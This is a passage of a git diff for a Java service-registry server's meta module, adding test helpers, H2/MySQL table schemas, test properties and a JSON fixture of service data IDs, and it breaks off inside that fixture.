Assert.assertTrue( + StringFormatter.format( + "{}, slots={}, data={}, ip={}, L={}, High={}, {}", + tag, + slotNum, + dataNodes.size(), + k, + v, + leaderHighAvg, + slotTable.transfer(null, true)), + v <= leaderHighAvg); + if (checkLowLeader) { + Assert.assertTrue( + StringFormatter.format( + "{}, slots={}, data={}, ip={}, L={}, Low={}, {}", + tag, + slotNum, + dataNodes.size(), + k, + v, + leaderLowAvg, + slotTable.transfer(null, true)), + v >= leaderLowAvg / 2); + } + } + + if (dataNodes.size() <= 3) { + return; + } + int followers = slotNum * (replicas - 1); + int followerHighAvg = MathUtils.divideCeil(followers, dataNodes.size()); + int followerLowAvg = Math.floorDiv(followers, dataNodes.size()); + for (Map.Entry e : followerCount.entrySet()) { + String k = e.getKey(); + int v = e.getValue(); + Assert.assertTrue( + StringFormatter.format( + "{}, slots={}, data={}, ip={}, F={}, High={}", + tag, + slotNum, + dataNodes.size(), + k, + v, + followerHighAvg), + v <= followerHighAvg * 1.5); + + Assert.assertTrue( + StringFormatter.format( + "{}, slots={}, data={}, ip={}, F={}, Low={}", + tag, + slotNum, + dataNodes.size(), + k, + v, + followerLowAvg), + v >= followerLowAvg / 2); + } + } + + public static String getDc() { + return "testDc"; + } + + public static String int2Ip(int ip) { + StringBuilder builder = new StringBuilder(String.valueOf(ip >>> 24)); + builder.append("."); + builder.append(String.valueOf((ip & 0X00FFFFFF) >>> 16)); + builder.append("."); + builder.append(String.valueOf((ip & 0X0000FFFF) >>> 8)); + builder.append("."); + builder.append(String.valueOf(ip & 0X000000FF)); + return builder.toString(); + } +} diff --git a/server/server/meta/src/test/resources/application-test.properties b/server/server/meta/src/test/resources/application-test.properties new file mode 100644 index 000000000..c3f286c9a --- /dev/null +++ b/server/server/meta/src/test/resources/application-test.properties @@ -0,0 +1,29 @@ +spring.main.banner-mode=LOG +nodes.metaNode=DefaultDataCenter:localhost +nodes.localDataCenter=DefaultDataCenter +nodes.localRegion=DEFAULT_ZONE +#server.logging.home=/home/admin/logs/registry + +#meta.server.logging.level=INFO +#meta.server.logging.home=/home/admin/logs/registry/meta +meta.server.sessionServerPort=9610 +meta.server.dataServerPort=9611 +meta.server.metaServerPort=9612 +meta.server.raftServerPort=9614 +meta.server.httpServerPort=9615 +meta.server.raftGroup=MetaServerRaftGroup + +meta.server.elector.lockExpireDuration=20000 + +## connect db +spring.h2.console.enabled=true +jdbc.driverClassName=org.h2.Driver +jdbc.url=jdbc:h2:mem:metadatadb;DB_CLOSE_DELAY=-1;MODE=MySQL;MV_STORE=FALSE +jdbc.username=sa +jdbc.password= +spring.datasource.schema=sql/h2/create_table.sql +#spring.datasource.data=sql/h2/base_info.sql + +#jdbc.typeAliasesPackage=com.alipay.sofa.registry.jdbc.domain +jdbc.mapperLocations=classpath:h2-mapper/*.xml +meta.server.revisionGcSilenceHour=24 diff --git a/server/server/meta/src/test/resources/application.properties b/server/server/meta/src/test/resources/application.properties deleted file mode 100644 index 386132e80..000000000 --- a/server/server/meta/src/test/resources/application.properties +++ /dev/null @@ -1,9 +0,0 @@ -spring.main.banner-mode=LOG -meta.server.logging.level=INFO -meta.server.sessionServerPort=9610 -meta.server.dataServerPort=9611 -meta.server.metaServerPort=9612 -meta.server.raftServerPort=9614 -meta.server.httpServerPort=9615 -meta.server.raftGroup=MetaServerRaftGroup -meta.server.decisionMode=RUNTIME \ No newline at end of file diff --git a/server/server/meta/src/test/resources/log4j2.xml b/server/server/meta/src/test/resources/log4j2.xml new file mode 100644 index 000000000..babcff687 --- /dev/null +++ b/server/server/meta/src/test/resources/log4j2.xml @@ -0,0 +1,220 @@ + + + + + ${user.home}/logs/registry/meta + INFO + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/server/meta/src/test/resources/logback-test.xml b/server/server/meta/src/test/resources/logback-test.xml deleted file mode 100644 index 5598cba71..000000000 --- a/server/server/meta/src/test/resources/logback-test.xml +++ /dev/null @@ -1,27 +0,0 @@ - - - - - - \ No newline at end of file diff --git a/server/server/meta/src/test/resources/sql/h2/base_info.sql b/server/server/meta/src/test/resources/sql/h2/base_info.sql new file mode 100644 index 000000000..e69de29bb diff --git a/server/server/meta/src/test/resources/sql/h2/create_table.sql b/server/server/meta/src/test/resources/sql/h2/create_table.sql new file mode 100644 index 000000000..44a18069a --- /dev/null +++ b/server/server/meta/src/test/resources/sql/h2/create_table.sql @@ -0,0 +1,64 @@ +drop table if exists APP_REVISION; +create table APP_REVISION ( + id bigint unsigned not null auto_increment primary key, + data_center varchar(129) not null, + revision varchar(128) not null, + app_name varchar(128) not null, + base_params longtext default null, + service_params longtext default null, + gmt_create timestamp not null, + gmt_modified timestamp not null, + client_version varchar(512) default null, + UNIQUE KEY `uk_data_center_revision` (`data_center`, `revision`) +); + +drop table if exists interface_apps_index; +CREATE TABLE interface_apps_index ( + id bigint(20) NOT NULL AUTO_INCREMENT, + data_center varchar(128) NOT NULL, + app_name varchar(128) NOT NULL COMMENT '应用名', + interface_name varchar(386) NOT NULL COMMENT '接口名', + gmt_create timestamp(6) NOT NULL COMMENT '创建时间', + gmt_modified timestamp(6) NOT NULL COMMENT '修改时间', + hashcode varchar(128) NOT NULL COMMENT '唯一索引hashcode', + reference tinyint(4) NOT NULL COMMENT '是否被引用', + PRIMARY KEY(id), + UNIQUE KEY `uk_hashcode` (`data_center`, `app_name`, `hashcode`), + KEY `idx_data_center_interface` (`interface_name`) +); + +drop table if exists distribute_lock; +CREATE TABLE distribute_lock ( + id bigint(20) NOT NULL AUTO_INCREMENT primary key, + data_center varchar(128) NOT NULL, + lock_name varchar(1024) NOT NULL, + owner varchar(512) NOT NULL, + duration bigint(20) NOT NULL, + gmt_create timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP, + gmt_modified timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP, + UNIQUE KEY `uk_data_center_lock` (`data_center`, `lock_name`), + KEY `idx_lock_owner` (`owner`) +); + +drop table if exists provide_data; +CREATE TABLE provide_data ( + id bigint(20) NOT NULL AUTO_INCREMENT primary key, + data_center varchar(128) NOT NULL, + data_key varchar(1024) NOT NULL, + data_value mediumtext DEFAULT NULL , + gmt_create timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, + gmt_modified timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, + `data_version` bigint(20) NOT NULL DEFAULT '0' COMMENT '版本号', + UNIQUE KEY `uk_data_center_key` (`data_center`, `data_key`) +); + + + + + + + + + + + diff --git a/server/server/meta/src/test/resources/sql/mysql/create_table.sql b/server/server/meta/src/test/resources/sql/mysql/create_table.sql new file mode 100644 index 000000000..b6147a14f --- /dev/null +++ b/server/server/meta/src/test/resources/sql/mysql/create_table.sql @@ -0,0 +1,68 @@ +CREATE TABLE `app_revision` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `revision` varchar(128) NOT NULL COMMENT 'revision', + `app_name` varchar(128) NOT NULL COMMENT '应用名', + `base_params` text DEFAULT NULL COMMENT '基础参数', + `service_params` text DEFAULT NULL COMMENT '服务参数', + `gmt_create` timestamp NOT NULL COMMENT '创建时间', + `gmt_modified` timestamp NOT NULL COMMENT '修改时间', + `client_version` varchar(512) DEFAULT NULL COMMENT '客户端版本', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_revision` (`data_center`, `revision`) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 913172 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '服务元数据表' + +CREATE TABLE `interface_apps_index` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名称', + `app_name` varchar(128) NOT NULL COMMENT '应用名', + `interface_name` varchar(386) NOT NULL COMMENT '接口名', + `gmt_create` timestamp(6) NOT NULL COMMENT '创建时间', + `gmt_modified` timestamp(6) NOT NULL COMMENT '修改时间', + `hashcode` varchar(128) NOT NULL COMMENT '唯一索引hashcode', + `reference` tinyint(4) NOT NULL COMMENT '是否被引用', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_hashcode` (`data_center`, `app_name`, `hashcode`) BLOCK_SIZE 16384 GLOBAL, + KEY `idx_data_center_interface` (`interface_name`) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1469202 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = 'interface与revision索引表' + +CREATE TABLE `provide_data` ( + `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `data_key` varchar(1024) NOT NULL COMMENT 'data key', + `data_value` mediumtext DEFAULT NULL COMMENT 'data value', + `gmt_create` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', + `gmt_modified` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT '修改时间', + `data_version` bigint(20) unsigned NOT NULL DEFAULT '0' COMMENT '版本号', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_key` (`data_center`(128), `data_key`(1024)) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '注册中心配置存储表' + +CREATE TABLE `distribute_lock` ( + `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `lock_name` varchar(1024) NOT NULL COMMENT '分布式锁名称', + `owner` varchar(512) NOT NULL COMMENT '锁拥有者', + `duration` bigint(20) NOT NULL COMMENT '持续周期', + `gmt_create` timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3) COMMENT '创建时间', + `gmt_modified` timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3) ON UPDATE CURRENT_TIMESTAMP(3) COMMENT '修改时间', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_lock` (`data_center`(128), `lock_name`(1024)) BLOCK_SIZE 16384 GLOBAL, + KEY `idx_lock_owner` (`owner`(512)) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '分布式锁' + + + + + + + + + + + + + + + + diff --git a/server/server/meta/src/test/resources/test/data_info_ids.json b/server/server/meta/src/test/resources/test/data_info_ids.json new file mode 100644 index 000000000..edb146912 --- /dev/null +++ b/server/server/meta/src/test/resources/test/data_info_ids.json @@ -0,0 +1 @@ +["com.alipay.insptmarket.facade.home.api.HomeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.UsageAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityToolQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.apgauss.common.service.facade.api.PricingModelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgengine.core.service.schema.SchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_RCINSPECT_INSPECT_PLAN_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.76.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbgrouppurchaseprod.common.service.facade.order.GroupOrderOperateMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.156.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.abilitycore.common.service.facade.plugin.PlugInConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.wsdkSecret,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.AcquireFxQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksmarttrade.common.service.facade.CashPlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:minicenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_DWALM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.service.facade.service.TinyappReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsecurity.common.service.facade.fullscene.GenCaseFromSceneDataFacade:1.0:offlineFinatp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dataclassification.facade.service.DcpDataClassFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulecenter.facade.common.ValidationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscs.common.service.facade.model.ModelUniteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttune.common.service.facade.backend.InterfaceService:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.core.service.repository.PurchaseControlOrderRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:rmyTTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.materials.MaterialsQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.island.IslandSignal.zonePrefixs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.meshyserver.common.service.facade.spi.BizSheetFacade:1.0:mrchMemberCardSheetFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.skipFinacialInfoBlockTemplates,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discount.common.service.facade.CrowdRuleDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imaspmng.core.service.right.RightManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_DPL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchservbase.member.facade.PrepaidCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.elastic.finpwm.finpwmXTradeSlaveDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.document.ExterfaceDocumentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:testApp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.mextitemcenter.common.facade.api.AutoApplyManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.ecm.common.service.facade.api.EcmExtraControlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:membertangram@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_replenishmentOrderBatchDetail@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_P_BLACKLIST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.routeclient.interfacename:skylark#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insusercenter.facade.evaluation.api.InsEvaluationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.materialcenter.common.service.facade.api.material.MaterialScopeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insdataprod.common.service.facade.diff.api.EstimateOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobileacauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.directory.DirectoryQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insdataprod.common.service.facade.weather.api.XinzhiWeatherService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.elm.InsZxdPrizeSendApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqcore.common.service.ha3.query.service.Ha3QueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zpaas.zpaas_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.seekers.facade.apis.DiagnosisViewQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tss.supportprod.facade.cptor.facade.manage.CptorContactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antmembermng_inappstReviewCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.fee.FeeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:paycore#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.insmobile.communityShardDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cfpcenter.cfpcenter_misc_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininflux.common.service.facade.mng.recover.InfluxStatusSyncService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditagreement@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imhomehk.common.service.facade.api.merchantservice.MerchantClerkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.148.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acmcscore.facade.ChangeOrderTemplateFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundmng.common.service.facade.InterestBatchQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:imhomehk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:miniselfopAfterOperateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.searchgw.common.service.facade.search.api.MySearchJubaoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.drm.client.zone@DRM#@#DEFAULT_INSTANCE_ID#@#DRM","config:com.alipay.anteye.service.MiniAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_BAOXIANPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:appstore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_labelConfigProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeprod.common.service.facade.api.label.LifeLabelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.SceneDataSyncDrmImpl.syncConfigJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkmissione.common.service.facade.PromoRobotRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.model.antworkbench.repository.AntWorkInformRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filebridge.service.batch.facade.spi.MessageReceiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianLiInvokeAppTrFacade:1.0:mobileha@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechannel.senior.common.service.facade.cardbindingprod.api.CardBindingPCFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kgengine.core.service.edit.KnowledgeEditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:iotcmgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.property.PropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.overseapcard.api.OSPCardtransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:securitymegadatacalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:true@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.AppRoleConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.defincustomer.facade.api.verifycode.VerifycodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.assetlibview.facade.api.AssetLibViewLinkQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalproxy:name=com.alipay.zdal.proxy.sla.drm.ZdalProxySlaDrm.schemaFlowControlRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vega.keeper.service.AppRegistryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpunish.facade.suspectevent.SuspectEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.SyncManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.dal.mobilerzone.daointerface.ShortCodeInfoDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.YuemaGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0:instbill@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ProductUspFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbcateringprod.common.service.facade.channel.api.CateShopPluginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm72#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.frservcenter.facade.api.BusinessProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.tis.service.UserAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.tag.TagItemMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.27.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dwdsds.common.service.facade.privilege.service.PrivilegeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.40.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cifin:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.globalConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.settlecore.RareWordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.core.identify.service.NewBizModelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.activity.service.UserActivityInstanceFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.redeem.facade.RepaymentPlanQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ctuofflineplt.common.facade.service.OfflineRuleService:1.0:ctuofflineplt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundapplication.common.service.facade.api.space.FundSpaceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.common.service.facade.api.FundTradeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.SysAnalysisServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudin